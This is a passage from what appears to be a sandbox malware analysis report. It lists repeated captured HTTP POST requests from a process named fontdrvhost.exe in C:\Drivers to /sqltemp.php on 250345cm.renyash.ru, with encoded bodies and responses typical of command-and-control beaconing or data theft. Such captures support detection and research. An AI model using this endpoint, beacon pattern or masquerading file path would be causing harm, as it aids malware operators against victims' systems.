                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdf5bfb643ee-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3776&min_rtt=1811&rtt_var=4609&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=83281&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            60192.168.2.449808104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:49.994513035 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:50.339601040 CET1008OUTData Raw: 53 55 5a 54 54 5d 54 55 58 56 52 59 56 59 59 5f 5b 58 54 58 55 5a 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SUZTT]TUXVRYVYY_[XTXUZP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['#Y%\%>@/2#,Z+_ *=+41?\+)17W9*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:50.472712040 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:51.034471035 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:50 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGomF%2FHa7EexpPfC6So495oiedSuwCE%2BrJEvX0A1Eojy57Lu7EQcXWp1EBwmDewSU8y6pgbhWKAuzzpXWpRQ%2BYtfLSo%2BiXDhByKON5baHMMrQeKEFF97ETARyNPaB8x7E4TAmpTa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fdfb29bc5e79-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4272&min_rtt=1662&rtt_var=5844&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=64759&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            61192.168.2.449809104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:51.150233984 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:51.495820999 CET1012OUTData Raw: 56 5e 5f 55 51 5c 51 57 58 56 52 59 56 5a 59 54 5b 59 54 59 55 55 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V^_UQ\QWXVRYVZYT[YTYUUPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X&?!]7!'.<.9" [3(*#W=$ ((]9A&,79&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:51.592094898 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:51.864300013 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:51 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lnx9Bpk2rGBPrbzYYF68i7D5R1QYL5PXB%2BtbIUS64jPKjWAlgfSlGlU%2B7GQNjykzEaxxqiAm5Y5MaqNrGMLid8OKGU0T%2Fnd2OcX%2BEmyxC4E3qRNJBwbxsix4Kt%2BAGZRYbJLPkX8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe022b85423a-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8356&min_rtt=1914&rtt_var=13603&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=27311&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            62192.168.2.449810104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:51.994693041 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:52.339708090 CET1012OUTData Raw: 56 50 5a 50 54 59 51 57 58 56 52 59 56 51 59 56 5b 53 54 5e 55 55 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VPZPTYQWXVRYVQYV[ST^UUP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/%#/0>D8!> Y+*#W>$[##\?8)%,(-*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:52.440845013 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:52.702603102 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:52 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DG%2FUbBuOxBnYycv3nLL0dvbVwAChw%2FwsdxHqqOlg9Q5kyxcnxNH5rjMTXjAOBte%2FeCGJzY7SzVspOa%2BAFZtSRsTfUPn7nPGD2e9qlOl8aKg1T1xY101iOzWOLJxpV9Er9M4T3OiB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe077ba36a50-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1756&rtt_var=5242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72662&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            63192.168.2.449811104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:52.822398901 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:53.167794943 CET1012OUTData Raw: 53 53 5f 5d 54 51 51 56 58 56 52 59 56 50 59 51 5b 59 54 5b 55 59 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SS_]TQQVXVRYVPYQ[YT[UYPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3*4!$-#8: -$Y?*<*4]73+@&(-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:53.266319036 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:53.529279947 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:53 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zaw3ZBfXil5qFjXZUy%2F5GsGC2TEwpMTELPxJtKVjwTFgSA4XgLUNldHts%2BU95Ynaw6g8J%2Fvrb9SCFld46t0OpmoR0YogeDsmvO6bB8QzH8cJLwR%2Bxu029noxmaM15yyNmOym1oNk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe0ca912efa7-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4215&min_rtt=1891&rtt_var=5358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=71268&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            64192.168.2.449813104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:53.654299021 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:54.011516094 CET1012OUTData Raw: 56 51 5f 56 54 5b 51 55 58 56 52 59 56 50 59 5f 5b 5e 54 58 55 58 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_VT[QUXVRYVPY_[^TXUXP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$<*7Y0>?C;!=?:7>>8]73X+D%'.:&Y.,Y-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            65192.168.2.449814104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:54.033298016 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:54.386501074 CET1852OUTData Raw: 56 56 5a 50 51 5c 51 55 58 56 52 59 56 50 59 54 5b 5d 54 59 55 5c 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VVZPQ\QUXVRYVPYT[]TYU\PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X0?49%.7E;-V#?(9(>$ +<;!E%/-:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:54.505791903 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:54.664134026 CET955INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:54 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bi9udwIQ2wDZk5XfJBhPQDoDG6RpkmA4aa%2F1M7Okk%2BJrkBauExUZcIL6N3812E6baVXisWT8RwYjszr8YeoWvLb8Wtca9h7B%2F45%2FgrTINqPIhVQmoIjp9ep6sGJc6oYmNbgFYrLh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe145f85425d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4354&min_rtt=1969&rtt_var=5509&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=69355&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0d 2a 13 04 1c 32 0c 05 05 3c 13 33 1e 25 3e 36 5a 3f 16 26 5c 27 3e 24 01 29 29 33 5d 35 3c 25 1c 31 38 3c 59 20 5b 3b 12 24 0e 2b 59 05 1c 20 06 21 2f 2c 11 2a 13 34 06 31 01 03 5a 33 3d 24 58 3f 3b 20 54 37 05 28 00 30 04 23 02 2a 3a 30 1d 27 2c 0d 5b 2f 2c 3d 52 24 00 2c 54 00 11 25 08 30 21 3f 06 23 37 28 5a 35 31 39 10 26 0a 00 15 32 3c 23 50 20 29 2a 16 25 0c 3b 13 23 23 2a 5a 27 2b 2d 5b 37 3d 0a 08 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&*2<3%>6Z?&\'>$))3]5<%18<Y [;$+Y !/,*41Z3=$X?; T7(0#*:0',[/,=R$,T%0!?#7(Z519&2<#P )*%;##*Z'+-[7=)>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            66192.168.2.449815104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:54.150602102 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:54.495874882 CET1008OUTData Raw: 56 53 5a 56 51 5a 54 5c 58 56 52 59 56 59 59 55 5b 5a 54 5c 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VSZVQZT\XVRYVYYU[ZT\UUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[0)7<1^0@.*&4-$Y+_#W)#72Z?+=%<7R.*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:54.595266104 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:54.850723028 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:54 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2Fe7GVl7f6dTG25EaMvNbg6IPdntVH6%2BbflTv79GeUKTxiTS1w9VavXVRhBA1HqwfZ9nSF5ypOQRD28ij1%2FKg5%2BsrTq8Cn9zNJqUyDrEglRxFVGWe%2BbYx2gz8aYjeYx95E7N%2FpgM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe14fe7242d3-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4447&min_rtt=2227&rtt_var=5276&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=73029&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            67192.168.2.449821104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:55.064404964 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:55.417722940 CET1008OUTData Raw: 56 52 5a 53 51 5c 54 51 58 56 52 59 56 59 59 55 5b 59 54 59 55 5a 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VRZSQ\TQXVRYVYYU[YTYUZPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&/]4?$<,9=V7>3<9 =-(]#" (862?,*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:52:55.535515070 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:55.705616951 CET810INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:55 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4mHlCScGv9dUe4ZNe%2Bs9%2BMyEtqnoxL7Do2gAkl6W%2BPMjSTXipbW%2FSMrJQtfmbJ1tIPZz9TByLy3THd88Nmp2kpr%2BrWvI9HKWARSrCFP3FDeHkT%2Bd6thlDooJOnM1zqsgpNNPyEK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe1ac8414400-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=1652&rtt_var=5772&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=65576&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            68192.168.2.449827104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:55.823117971 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:56.167776108 CET1012OUTData Raw: 53 53 5a 56 54 58 54 56 58 56 52 59 56 5d 59 50 5b 59 54 5f 55 55 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZVTXTVXVRYV]YP[YT_UUPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['5]"/*'.(,9=##(9(*>$\ 13[*("2?<::&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:52:56.267302990 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:56.529376030 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:56 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
